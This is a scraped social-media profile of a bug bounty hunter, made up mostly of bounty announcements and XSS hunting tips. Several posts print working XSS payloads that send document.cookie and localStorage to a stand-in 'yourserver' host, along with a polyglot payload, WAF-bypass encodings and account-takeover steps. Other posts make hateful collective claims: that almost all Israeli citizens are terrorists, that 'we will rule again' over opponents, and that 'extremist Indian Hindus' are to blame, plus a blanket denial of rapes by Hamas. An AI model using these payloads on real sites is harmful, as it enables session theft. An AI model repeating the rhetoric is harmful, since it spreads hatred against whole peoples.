Sourav Khan🇧🇩 🇵🇸
@Br0k3n_1337
Followers
2,312
Following
970
Media
95
Statuses
696
Bug Bounty Hunter | Muslim❤️
Bangladesh
Joined October 2020
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
オリンピック
• 633435 Tweets
Christians
• 334503 Tweets
Christianity
• 241812 Tweets
花火大会
• 199155 Tweets
グラブル
• 104099 Tweets
Endrick
• 97769 Tweets
Itália
• 72940 Tweets
#withMUSIC
• 40658 Tweets
#VoleiNaGlobo
• 39580 Tweets
Darlan
• 38355 Tweets
#AkatsukiJapan
• 35917 Tweets
永山選手
• 29806 Tweets
#ぱかライブTV
• 27728 Tweets
#1ล้านความรักเจ้าหัวใจ
• 23859 Tweets
1M LOVE LINGORM
• 23371 Tweets
コラボガチャ
• 15735 Tweets
男子バスケ
• 14116 Tweets
Leal
• 13941 Tweets
Flávio
• 13407 Tweets
花火の音
• 12657 Tweets
Bruninho
• 12518 Tweets
Lucão
• 11569 Tweets
Lucarelli
• 11213 Tweets
Bernardinho
• 10427 Tweets
Pinned Tweet
All Praise is Due to Allah Alone❤
I earned $10,247 for my 3 submissions on
@Hacker0x01
Note: There is an old report that was initially rewarded with $700, but later they upgraded the severity and rewarded an additional $1,879. I didn't include those $700 in this post.
13
6
169
All praise is due to Allah alone❤
I earned $1,316 for my submission on
@Hacker0x01
Bug: XSS to information Disclosure.
I have used double URL encoded version of this payload:
<img src="x" onerror="fetch('
http://yourserver/?cookie='
+ encodeURIComponent(document.cookie));">
15
55
382
Alhamdulillah❣️
I earned $1,690 for my 13 submissions on
@Bugcrowd
#ItTakesACrowd
#bugcrowd
#bugbounty
13
10
215
Alhamdulillah & Allahu Akbar❤️
I earned $2,895 for my submission on
@Hacker0x01
It was an interesting finding. Maybe I will share a post about it after it get fixed.
15
3
207
In the name of Allah, the Most Gracious, the Most Merciful❤️
Here is a unique bug bounty tip for XSS to Account Takeover:
Suppose you have found an XSS at www.redacted./com
But all Authentication cookies of it are "HttpOnly" flag set. So you are unable to steal those cookies
15
26
206
Alhamdulillah❤
I earned $1,220 for my submission on
@Bugcrowd
Bug Bounty Tips:
When testing a target, forget the fact that others have also tested it. Assume it is new, and check for all vulnerabilities from P4 to P1.
#bugbounty
#bugcrowd
#ItTakesACrowd
#bugbountytip
10
8
173
All praise is due to Allah alone❤
I earned $3,080 for my submission on
@Hacker0x01
Bug: Stored XSS leads to permanent account takeover. (I mean it)
Check subpost for tips
#bugbounty
#xss
#bugbountytip
#bugbountytips
#payload
#hackerone
#xsspayload
#BugBounty
#xsspayloads
7
16
173
Alhamdulillah❤
MongoDB rewarded me with a Bonus of $1,200 on
@Hacker0x01
and at present my Rank is
#1
on their Leaderboard.
#Bugbounty
#hackerone
#TogetherWeHitHarder
8
4
141
All praise is due to Allah alone❤
I earned $125 for my another submission on
@Bugcrowd
#ItTakesACrowd
#bugcrowd
#BugBounty
6
2
138
All praise is due to Allah alone❤
I earned $660 for my 3 submissions on
@Bugcrowd
#ItTakesACrowd
#bugcrowd
#bugbounty
5
3
136
12
4
124
All praise is due to Allah alone❤
I earned $2,947 for my submission on
@Hacker0x01
.
Bug: Reflected XSS leads to permanent account takeover.
#bugbounty
#xss
#bugbountytip
#bugbountytips
#payload
#hackerone
#xsspayload
#BugBounty
#xsspayloads
#TogetherWeHitHarder
8
8
125
All Praise Be to Allah❤
@Bugcrowd
Rewarded me with a Bounty of $350.
Bug: WAF Bypass >> XSS
#bugcrowd
#ItTakesACrowd
#bugbounty
#xss
10
2
105
All praise is due to Allah alone❤
I earned $450 for my 3 submissions on
@Bugcrowd
#ItTakesACrowd
#bugcrowd
#BugBounty
15
3
102
Alhamdulillah❤
I earned $1,040 for my submission on
@Hacker0x01
Bug: Stored XSS on the mobile version of the website leads to a permanent account takeover.
Check subpost for tips
#bugbounty
#xss
#bugbountytip
#bugbountytips
#hackerone
#BugBounty
#togetherwehitharder
7
6
104
Alhamdulillah❤
I earned $150 for my submission on
@Hacker0x01
Bug: Information Disclosure
Here are some tips:
1. Enumerate all the subdomains of the target
2. Get a list of configuration files.
3. Fuzz with ffuf or other tools.
#bugbounty
#bugbountytips
#bugbountytip
4
13
96
Alhamdulillah❣️
I earned $300 for my another submission on
@Bugcrowd
#ItTakesACrowd
#bugcrowd
#bugbounty
5
1
97
Alhamdulillah❣
I earned $200 for my 2 submissions on
@Hacker0x01
#TogetherWeHitHarder
#bugbounty
#hackerone
1
3
93
We Bangladeshi Muslim Support the Freedom fighters of Palestine.
Palestine must get back their Freedom, Rights, And Land.
#GoAheadPalestine
11
8
90
All praise is due to Allah alone❤
I earned $100 for my another submission on
@Hacker0x01
#TogetherWeHitHarder
#bugbounty
#hackerone
3
1
90
[Thread]
If you can't focus on a Sigle program because it's Huge. Then instead of testing the whole target you can follow this rules:
1. Enumerate all the subdomains
2. Run httpx tool on different ports of those subdomain
7
32
90
Alhamdulillah❤
I earned $700 for my submission on
@Hacker0x01
Bug: 0 Click Account Takeover
I'm still disagree with the severity set by the triager.
#bugbounty
#hackerone
#BugBounty
#TogetherWeHitHarder
9
5
78
Alhamdulillah😊
A program rewarded me with a $733 bonus for becoming the District Champion of their campaign at
@Hacker0x01
#BugBounty
#hackerone
1
2
81
Sometimes this chart will help you to bypass firewall and Encoding:
I have bypassed a well-known firewall using this.
Ex:
The firewall prevented me from closing any HTML tag. I just used:
�</a>
And Boom. the firewall was bypassed. And a Tag was closed
1
22
74
Alhamdulillah😊
Today I earned $200 for my 2 submissions on
@Hacker0x01
#TogetherWeHitHarder
#bugbounty
#hackerone
6
1
68
Alhamdulillah☺
For the first time ranking
#1
on the
@Hacker0x01
leaderboard of Bangladesh and Ranking
#10
internationally based on "Highest Reputation"
#hackerone
#bugbounty
6
2
68
Alhamdulillah❤️
I earned $350 for my submission on
@bugcrowd
Tips: Immediately Retest your report after it gets resolved.
#ItTakesACrowd
#bugbountytip
#bugbountytips
#bugbounty
#xss
3
3
68
I have used the polyglot XSS payload of
@brutelogic
:
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</code/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//0.rip/m\76-->
4
17
69
Here is how I have found 3 Reflected XSS Easily Just using a Simple Technique:
[Thread]
>> Found XSS at
1
8
54
Alhamdulillah❤
I awarded $100 on
@inspectiv
and $50 on
@Bugcrowd
#bugbounty
#bugcrowd
#inspectiv
#xss
2
3
46
All Praise Be to Allah❤
@Bugcrowd
Rewarded me with a Bounty of $125
#ItTakesACrowd
#bugcrowd
#BugBounty
3
1
45
3
0
47
4
0
43
3
1
41
3
0
39
This is How I choose a Bug Bounty Program:
1. Wide scope
2. Fast response time
3. The Program that pays a fair amount of Bounty.
4. The program that got fewer submissions from hunters.
5. Fewer rules.
6. New on the Platform
#bugbounty
#bugbountytips
0
7
40
Alhamdulillah😊
I earned $200 for my another submission on
@Bugcrowd
#bugcrowd
#ItTakesACrowd
#bugbounty
4
0
36
Alhamdulillah❤
I earned $110 for my vulnerability report to
a Self Hosted Bug Bounty Program.
Bug: post based xss
#bugbounty
#xss
3
1
36
Bug Bounty Tips:
Here is An XSS payload that steals both Cookies and Local Storage Data:
<svg/onload='const url = `
https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}`;
fetch(url);'>"
1
9
37
Me too.
AllahuAkbar☝️
If you support Israel, do both of us a favour and consider unfollowing / blocking me.
0
107
822
0
0
30
1
0
29
A Collection of GitHub Dorks for Bug Bounty Hunters
#bugbounty
#bugbountytip
#githubDorks
#dorks
#dorking
0
7
28
@burhanvejalpur
@bxmbn
@fattselimi
@NinadMishra5
I believe performing wudu 5 times a day will keep your eyes and body refreshed. And performing Salah 5 times a day at the mosque will keep your body healthy. Whenever you feel exhausted perform wudu and nafl Salah. You will feel better InShaAllah. Also, do basic exercise everyday
2
3
25
@0xNaeem
Just an example:
httpx -l allsub.txt -silent -timeout 20 -p 8443,443,3306,1-5 -o resolved.txt
It will look on ports 8443,443,3306 and ports 1 to 5
1
12
22
@ReebootToInit5
@IDF
My country is not limited to a specific area. Every Muslim country is my country. We will rebuild the Muslim empire soon In-Sha-Allah.
We ruled over you, and we will rule again to establish peace and destroy your hatred.
And we are not broken. We are strong and becoming stronger.
11
1
24
Hi
@jobertabma
I hope you are doing well. Recently, I reported an XSS vulnerability to a private BBP, and they awarded the submission and resolved the issue. Then, I found a bypass and reported the XSS vulnerability again.
A triager duplicated the submission as a case from 2022
4
1
23
3. if the victim login to test.example./com and click on your malicious link which is any.example./com./?=payload
4. Then his cookie of test.example./com will be sent to you server
5. Report title should be "xss on any.example./com leads to account takeover at test.example./om"
0
1
24
Bug Bounty Tip:
The more time you invest in understanding a website, the better results you will achieve. For example, I have been hunting on the same program for the past 3 months.
#bugbountytip
#bugbountytips
#BugBounty
#xss
#hackerone
3
2
21
Bug Bounty Tips:
When looking for stored XSS, consider using a polyglot payload instead of normal one. Record a video POC showing max impact. Failing to do so might lead to a lower severity rating. And feel free to express your opinion if you disagree with the assigned severity
2
2
18
Extremist Indian Hindus🤬
Muslim Girl Repeatedly R
@ped
For Two Years In School.
A minor Muslim student was repeatedly raped for two years in a school in Bihar by a Hindu man named Samrat Vishwas,who is the son of school's director.
The traumatised Muslim girl says Vishwash regularly used to lock her in
490
4K
5K
1
4
14
Bug Bounty Tips:
If your payload didn't work on the desktop version of the website, then try to visit the same endpoint from your mobile. The mobile version of the website could be vulnerable.
2
0
17
2. If you have found an XSS then don't just popup an alert and report it. Show proper impact. Hijack victim's session, Steal local storage data or try to escalate the severity via chaining with other Bugs.
#bugbounty
#xss
#bugbountytip
#bugbountytips
#payload
#hackerone
2
2
17
If your report get resolved then try to reproduce it again from both desktop and mobile. Sometimes mobile version of the website could be still vulnerable.
1
0
16
If your target is secured with CSP. Then Try to bypass it:
#BugBounty
#bugbountytips
#firewall
#firewallbypass
#csp
#cspbypass
0
11
19
Steps:
1. Enumerated the user's email via a misconfigured signup form
2. Bypassed the rate limit mechanism of the password field and obtained the password
3. Acquired the 2FA code through brute-forcing.
4. Performed additional technical tasks.
5. Finally, logged into the account.
1
2
13
XSS Tips :
1. If the Application encode your input properly, then still execute 2 version of your polyglot payload:
Single url encoded version and Double url encoded version. Depends on how the application handle user's input your payload may still be executed.
1
0
11
All Praise is Due To Allah❤
Just Started this new month by receiving a Bounty of $200 from
@Bugcrowd
Tips:
Sometimes changing the language of the website may introduce a new bug. Check sub-tweet for example.
#bugcrowd
#ItTakesACrowd
#bugbountytips
#bugbounty
1
0
11
Watch this before blindly supporting Israel.
0
2
11
@SirBagoza
@Hacker0x01
Yes, you are right. Sharing the bounty amount could be a bad idea. But I think Allah is sufficient to protect me from evil eyes. I will think about it. Thanks for your advise.
1
0
11
USA helping Israel to kill children.
Israeli settler terrorists torched a young Palestinian boy near Hebron. His crime is being Palestinian.
20
291
533
1
0
9
Example:
1. Suppose you have found xss on any.example./com. But all of it's cookie is httponly set
2. You have discovered another subdomain which name is test.example./com. Its cookie is wild card set. And there is no httonly flag.
1
0
13
@3ncryptSaan
@ReebootToInit5
@errorsec_
It is his matter that he supports Israel. And this is my matter that I support Palestine. That is not related to bug bounty. It is not prohibited in Islam to trade with non-Muslims. So, I will continue to hunt on Hackerone.
4
0
8
But still there is a way to escalate this to account takeover. Here is how:
1. Enumerate all the subdomain of the target
2. Look for users login form or signup form.
3. If you find any then login to them with your test account
4. Open your browser dev tool and check the cookie
2
0
9
Almost all the citizens of Israel are extremists and terrorists.
We might be able to upload 2 hours of video now, but all you need is 1 minute to understand that Israel is a terrorist state occupying the land of Palestine.
Today was the day of the Israeli flag march through occupied East Jerusalem. This is what it usually looks like.
261
8K
10K
0
3
8
6. If you are unable to find any bugs on that subdomain then switch to the next subdomain or target. And don't forget to take a little break before moving to the next target.
#bugbounty
#bugbountytips
#bugbountytip
#recon
1
2
7
0
3
6
Alhamdulillah.
I have Found a Security Vulnerability at
@RealTryHackMe
and they have Rewarded Me with 2 Month
#tryhackme
Subscription.
Thanks,
@RealTryHackMe
for the Reward and Polite Behavior.
#bugbounty
#swag
0
1
5
Indian Hindus who wanna show their Support to Israel should use this opportunity😁
🚨 Israel Seeks to Bring In 50,000-100,000 Indian Workers for Jobs Formerly Held by Palestinians
773
582
3K
0
1
6
>> Tried to find XSS at another subdomain at the same endpoint and its worked.
>> Tried to Find XSS at another TLD at the same endpoint and its Worked
#xss
#bugbounty
#bugbountytip
@theXSSrat
0
1
7
@ReebootToInit5
@IDF
We dreamed it before, became successful, and built the Ottoman Empire. Ruled over Europe and Asia. Even in Varat.
We dream that again and We will be successful again. In-Sha-Allah
1
0
6
@Bugcrowd
'"><script>confirm()</script>
>> <script> tag removed by WAF
Now URL encode the whole payload to bypass this WAF.
Example:
html?param=%27%22%3e%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%29%3c%2f%73%63%72%69%70%74%3e%20
0
5
7
Israeli Army are Inhuman and terrorist😡
🔴UPDATE:
#Israel
#Palestine
The Israeli army arrested pregnant Palestinian journalist Somaya Jawabra and her husband Tariq Yousef.
Jawabra is 7 months pregnant and the mother of 3 young children
More here ⤵️
5
35
38
0
0
6
Yo..!
Just got 6 Months
@RealTryHackMe
Voucher by completing a simple CTF Challenge Hosted by
@ErrantPacket
.
The flag was hidden on the TXT record of the Domain.
Simple dig command revealed that flag.
Command:
dig (domainname).com txt
Flag:
EPXMAS{zfC8vX}
0
2
5
5. Hunt on that subdomain. Apply all the methods you know.
Like: Enumerating endpoints through burp, shodan GitHub, gauplus,hakrawler,Alienvault and applying different hacking techniques on them. Play with responses.
1
0
6
1
1
4
5. Check if any of the subdomains cookie is there without "httponly" flag set. It has to be also wildcard cookie (.example.com)
6. If the authentication cookie is set to wildcard and if it's there without "httponly" flag then you can steal it from the domain you have found xss
1
0
6
3. Visit all those resolved subdomains you got from httpx
(you can use this chrome extension to open multiple URLs at once :
4. Now select a subdomain that seems different , interesting ,vulnerable ,not tested by others.
1
0
6
@kingcoolvikas
There are 2 conditions required :
1. The cookie should not be an httponly flag set
2. The cookie should be wildcard set (example: *.redacted./com)
1
0
6
@kingcoolvikas
1. Open chrome dev tool and go to "Application" tab
2. Click on "Cookies"
You will see a section there called "Domain"
Explanation:
.github.com (it means the cookie is accessable from all the subdomain)
github./com (it means the cookie is only valid for github./com
0
0
6
@Jayesh25_
If all the above methods are not working then here is another way to perform account takeover:
In the name of Allah, the Most Gracious, the Most Merciful❤️
Here is a unique bug bounty tip for XSS to Account Takeover:
Suppose you have found an XSS at www.redacted./com
But all Authentication cookies of it are "HttpOnly" flag set. So you are unable to steal those cookies
15
26
206
1
0
4
The program is very old but still home page of it's website was vulnerable to xss
Why no one reported it before?
Well, the reason could be the website was encoded their input properly. That's why they left it without trying double url encoded version of their payload.
1
0
5
@Aavez11
@z3r01k
@Hacker0x01
Check the link below. Combine some of the wordlists from there and make your own wordlist.
0
2
5
I believe this is not a duplicate at all. I reported the vulnerability immediately after it was resolved. Could you please take a look at it?"
0
0
5
@Bugcrowd
Here it is:
Sometimes this chart will help you to bypass firewall and Encoding:
I have bypassed a well-known firewall using this.
Ex:
The firewall prevented me from closing any HTML tag. I just used:
�</a>
And Boom. the firewall was bypassed. And a Tag was closed
1
22
74
0
1
5
@errorsec_
What about those who Are just normal people of Palestine, little children, women, aged people who were killed by Israeli forces..?
I saw several videos where Israeli forces kicked out old men, and shot down innocent people., bombed on civilians.
1
0
4
@Steiner254
@Hacker0x01
Ha ha. I have described to them how an account takeover is possible in another report, so in this report, I have shown that XSS exists.
'"--></title></script><svg/onload=alert('anything')>
1
3
5
@errorsec_
You are supporting your friend Israel. You never supported Humanity.
If you want to support humanity then speak for free Kashmir, free Palestine.
1
0
3
And don't forget to Fuzz with Private and Public wordlists to Reveal Sensitive Directories and Hidden Parameters. In this case, You can use Arjun Tool to find Hidden parameters and the ffuf tool to find sensitive directories or files.
1
0
5
@3ncryptSaan
@rounak131106
@ReebootToInit5
@errorsec_
Yes, news only shows 1%, 99% stay undisclosed. You would not believe how many Hindus from India and Bangladesh messaged me to get help to start bug bounty and other stuff. I tried to help them all.
But when someone speaks ill about people from my religion, I will not tolerate it
1
0
3
@errorsec_
You can't show me a single video where an Israeli girl was raped by Hamas Solder.
That is not in our culture.
AllahuAkbar☝️
2
0
4